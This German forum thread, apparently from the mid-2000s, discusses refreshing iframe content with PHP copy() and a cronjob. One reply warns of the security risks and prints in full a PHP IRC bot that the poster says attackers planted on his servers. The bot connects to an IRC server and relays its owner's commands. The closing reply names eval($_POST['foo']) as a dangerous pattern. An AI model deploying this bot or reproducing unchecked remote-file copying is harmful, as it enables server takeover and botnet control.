I-Frame nur 5 mal pro Tag updaten

MrBosi

Crazy Globetrotter
20 April 2006
93
0
Hallo,

ich muß mich gleich mal outen. Denn ich habe im Moment keine Vorstellung, wie ich das folgende Szenario hinbekommen kann.

Und zwar möchte ich z.B. 5 mal am Tag Daten, die ich als Iframe von einem Partner in meine Webseite lade, in eine eigene Kopie-Seite integrieren.

Meint. Ich stelle mir vor, eine eigene bestehende Seite, wird 5 mal durch einen neuen IFRAME Schnappschuß des Original Iframes aktualisiert.

Hintergrund ist der, dass mir durch den Iframe Datenbankabfragekosten entstehen, welche ich durch diese eigene Seite im erträglichen Maß halten will. Zumal die Daten eh nur wenige Male am Tag aktualisiert werden.

Kriegt man das irgendwie hin ?

Vielen, vielen Dank vorab
 
Du brauchst praktisch bloß n Einzelzeiler PHP-Script (kommt auf die Serverkonfiguration an), was dir die Partnerseite auf deinen Space kopiert.
Ein Cronjob führt das Script dann die benötigten 5x/d aus.

Im IFrame lädst du einfach nur die lokale Kopie.
 
kleine Frage am Rande:

wieso muss das ein Einzelzeiler-Script sein?

Können Cronjobs nur eine Zeile verarbeiten? ICh kenne mcih damit nicht aus...

kann ich dann nich einfach per include() oder so ein komplexeres Script laufen lassen?
 
Nicht schwer ist relativ.

Ich erzähle Euch alles von Geldanlegen, Krediten und Co, aber dies ist schon net so überschaubar für mich, bin zwar arg dabei.... aber ich merke, dass man wohl schon die PHP etc. Gene in sich haben muss....

Vielen Dank auf jeden für die Infos...
 
flashas schrieb:
theHacker wollte damit ausdrücken, dass es nicht kompliziert ist.
Exakt :D
MrBosi schrieb:
aber ich merke, dass man wohl schon die PHP etc. Gene in sich haben muss....
Da brauchst du keine Gene, in 4 Wochen hatte ichs damals drauf ;)

Diese Funktion brauchst du:
https://de2.php.net/copy
PHP:
<?php
copy("https://www.example.com/externe_daten.php","/meinspace/partner_daten.html");
?>
Wenn die Serverkonfiguration passt (s. hierzu auch den obigen Link), müsste es mit dieser einen Zeile getan sein.
 
Werde es gleich versuchen....

aber mit den 4 Wochen ist fies... sag wenigstens, dass du Informatik oder so studiert hast...;)

oder wenigstens aus der Umgebung dieser Studienrichtung ..... seufz..
 
MrBosi schrieb:
aber mit den 4 Wochen ist fies... sag wenigstens, dass du Informatik oder so studiert hast...;)
Ich beginne mein Informatikstudium erst in 5 Monaten ;)
 
theHacker schrieb:
Ich beginne mein Informatikstudium erst in 5 Monaten ;)


hättest du ihm net was aufmunterendes schreiben können ?^^

wobei können ja auch relativ ist.

kleineres zeugs kontne ich auch nach ca 6 wochen.

nur jetzt nach einem jahr sollte man sich sein damals geschrieben net mehr anschauen ^^.
jetzt trau ich mich auch an größeres an weil man nach soner zeit einfach viel gemacht hat und auch routine drinne hat für vieles.
 
White schrieb:
hättest du ihm net was aufmunterendes schreiben können ?^^

wobei können ja auch relativ ist.

kleineres zeugs kontne ich auch nach ca 6 wochen.

nur jetzt nach einem jahr sollte man sich sein damals geschrieben net mehr anschauen ^^.
jetzt trau ich mich auch an größeres an weil man nach soner zeit einfach viel gemacht hat und auch routine drinne hat für vieles.


Hau rauf, hau rauf.


Bin aber erst wirklich neu dabei, PHP erst seit 2 Wochen durch VHS.... man.... und da zeigt er halt erst, wie man ein Formular am besten mit PHP erstellt. Werde mich nachher... wieder ein Kursabend.... gleich mal beschweren, dass er den Copy Befehl nicht bisher schon erklärt hat.;)

Und dies mit diesem Cronojob soll er erklären...

Man... war das mit Optionen, Optionsscheinen und ner schönen Baufi. einfach 8)

Auf jeden Fall nochmals besten Dank an alle.
 
Zuletzt bearbeitet:
Schau dir für das Script am Besten mal die Datei-Funktionen (öffnen, auslesen, schreiben, schließen sind hier mal die Wichtigsten) an.

Filesystem
 
nochwas zu dem copy befehl

zu vielen sachen denkste garnicht das php da ne funktion hat also deshlab immer auf php.net nachschauen
 
Hi

MrBosi schrieb:
...aber mit den 4 Wochen ist fies... sag wenigstens, dass du Informatik oder so studiert hast...;) ...

Das kommt Alles mit der Zeit!
PHP ist doch in vielen Richtungen arg mächtig, und ich glaube, daß man da gar nicht alles wissen kann.
Selber stricke ich mir meine Scripte aus den Befehlen zusammen, die ich bisher kennenlernen durfte.
Mag sein, daß PHP dafür elegantere Lösungen bietet, aber hier ist erstmal der Weg das Ziel.
Wenn's dann noch funktioniert -> umso besser :ugly:
Durch's zerlegen von bestehenden Scripten (am Besten noch Dokumentierte) lernt man außerdem noch gut was dazu, was die Progger da womit wozu gemacht haben.
PHP.NET klärt einen bei Syntax-Fragen auf, also wie ein Befehl genutzt wird bzw. was der überhaupt bewirken soll.
Denke, daß neben meiner eigenen Seite PHP.NET ähnlichen Traffic durch mich abbekommt :mrgreen:

Mit den besten Wünschen für zukünftige Script's
Posti
 
HI

Also so elegant sind die einzeiler nicht. Denn es handelt sich um einen Dumm Code, wie ich es so gerne nennen mag. Es wäre net gut eine Seite zu kopieren die nen header HTTP NOT FOUND kopiert, wenn der Partner mal kurzfristig off ist. Dann zeigt man bei 5 Mal am Tag seinen Usern 4,8 Stunden lang ein Offlinezustand der eigenen Seite an, obwohl der nicht gegeben ist.

Noch besser ist es wenn man an einen Readdirect oder sonstige Umleitung stösst. Deshalb kann ich solche Lösungen nicht ganz empfehlen. Ausserdem ist es so auch sehr gut, wen man sich dadurch ein kleines Virus auf die eigene HDD kopiert, und den Usern als verfügbare Seite darbietet (auführbar macht mitm CHMOD 777) wo möglich noch.

Deshalb wird auf der Webseite von PHP Manual von einer verwendung des Copy befehls ausserhalb dringend abgeraten.

Ein guter PHP Code ist in meinen Augen ein Code, der mit so wenig wie nötig Opreationen und Anweisungen auskommt, jedoch so individuell wie der Gebrauch es vorsieht reagieren kann. Was natürlich mit einem Dumm Code nicht getan ist.

Ich habe in der Vergangenheit mir schon durch solche Codes sehr weh getan, und deshalb habe ich das mal hier gepostet. Und zwar hatte ich das Problem gehabt, dass ich eine Menge DL Daten anbieten musste, die über mehrere Webserver verteilt waren. Also habe ich mich eines Kopiervorgangs bemüht. War zwar net mit Copy sondern mit file_get_contents und das schreiben in Dteien auf dem Zielserver. So habe ich mir ermöglicht, dass ich eine Datei jeweils nur auf einen Server bringen musste, und der dann an die restlichen ausgeteilt hat. Bzw. Die anderen haben sich die Datei vom anderen Server geholt.

Alles klappte wunderbar. Bis auf einmal User riesige Guthabenssummen auf meinen Virtuellen Konten hatten. Und ich wusste gleich, dass ich gehackt wurde. Nur wusste ich nicht wodurch. Und ich habe mir dann das exemplar zur erinnerung aufgehoben, was ich mir selbst einkopiert hatte.

Hier mal für alle:
PHP:
<?  
$server = "irc.de.quakenet.org"; // <---da kommt der server rein.//  
$port = "6667"; //<--port.//  

$nick3 = ""; //<----da kommt der ident rein.//  
$realna = ""; //<---da der realname. //  
$owner = ""; //<---da kommt der nick des botbesitzers rein.//  
if (!$nick2)  
{  
$nick2 = "***";  
}  
$connect = fsockopen($server, $port);  
echo "<title>".$nick2."</title>";  
fputs($connect, "USER $nick3 0 0 :$realna\n\r");  
fputs($connect, "NICK $nick2\n\r");  
echo "Running ";  
while(!feof($connect))  
{  
$new = fgets($connect, 1024);  
$part = explode(" ",$new);  
if($part[0] == "PING")  
{  
$ping = explode(":", $new);  
$reply = $ping[1];  
fputs($connect, "PONG $reply\n\r");  
if (!$firstrun) {   
fputs($connect, "JOIN #minimi,#polite \n\r");  
$firstrun = "1";  
}  
}  
if(substr($part[2],0,1) != "#" && $nick == $owner) {  
if(substr($part[3],0,2) == ":!")  
{  
$part_count = count($part)-1;  
$i = "3";  
$part[3] = substr($part[3],2);  
while($i <= $part_count)  
{  
$cmd.=$part[$i]." ";  
$i++;  
}  
fputs($connect, "$cmd\n\r");  
unset($cmd);  
}  
}  
elseif(substr($part[2],0,1) == "#")  
{  
$nick = explode("!",$part[0]);  
$nick = substr($nick[0],1);  
if(substr($part[3],0,5) == ":!hop" && $nick == $owner)  
{  
fputs($connect, "part $part[4] rejoining. \n\r");  
fputs($connect, "join $part[4] \n\r");  
}  
elseif(substr($part[3],0,2) == ":!" && $nick == $owner)  
{  
$part_count = count($part)-1;  
$i = "3";  
$part[3] = substr($part[3],2);  
while($i <= $part_count)  
{  
$cmd.=$part[$i]." ";  
$i++;  
}  
fputs($connect, "$cmd\n\r");  
unset($cmd);  
}  
}  
}  
?>

Jeder der den Code analysiert weis was ich mir auf die 7 Server kopiert habe. Ein IRC Bot!

Nun habe ich mich hunderte von Tagen gefragt wie das möglich ist, da ich ja ausdrücklich meine Server antellefoniert habe. Bis ich eines Tages meine Domain eingegeben habe, und kam auf nem Server raus, der nicht mir gehörte.

Jep als ich an diesem Tag meinen Server heimsuchte, waren so gut wie alle Daten gelöscht worden, und der Server war voller solcher Dateien. Natürlich sind alle 7 Server betroffen worden. Mein Projekt war von heute auf morgen gelöscht. Ich hatte zwar Datenbank Backups aber was bringt das, wenn die ganzen Zips und Rars verschwunden waren, die ich über jahre gesammelt habe. Und damals gabe es noch nicht den 100% Backup Service.

Nun die Hacker sind wie folgt vorgegangen. Vermutlich hatten diese DNS Server gehackt (keine Ahnung bis heute). Jednfalls lief meine Domain für ein paar Minuten über ein fishing. So nun einer meiner Server fordert eine Datei vom anderen. Das sieht nun der Hacker in seinem Protokoll. Nun kopiert sich der Bot vom Server des Hackers zu mir. Kann gut sein, dass das ganze über weitere Server glaufen ist.

Deshlab eben nochmal, so ein copy() befehl gehört nur im bereich des Servers angewendet. Oder aber man prüft was man empfängt. Mach net den Fehler, den ich schon gemacht habe.
 
ABC schrieb:
Es wäre net gut eine Seite zu kopieren die nen header HTTP NOT FOUND kopiert, wenn der Partner mal kurzfristig off ist.
Stimmt.
Eine Socket-Verbindung kann sowohl einen Timeout schnappen, wie man auch im Anschluss den HTTP-Statuscode überprüfen kann.
ABC schrieb:
Deshlab eben nochmal, so ein copy() befehl gehört nur im bereich des Servers angewendet. Oder aber man prüft was man empfängt. Mach net den Fehler, den ich schon gemacht habe.
Mein Beispielcode hatte als Zieldatei die Endung .html. Wenn du also nur Daten kopierst und anzeigen lässt, kann dir das ned passieren.
Anders sieht es halt aus, wenn du das ausführst, was du dir rüberlädst. Is ungefähr so, wie ein eval($_POST['foo']) :ugly: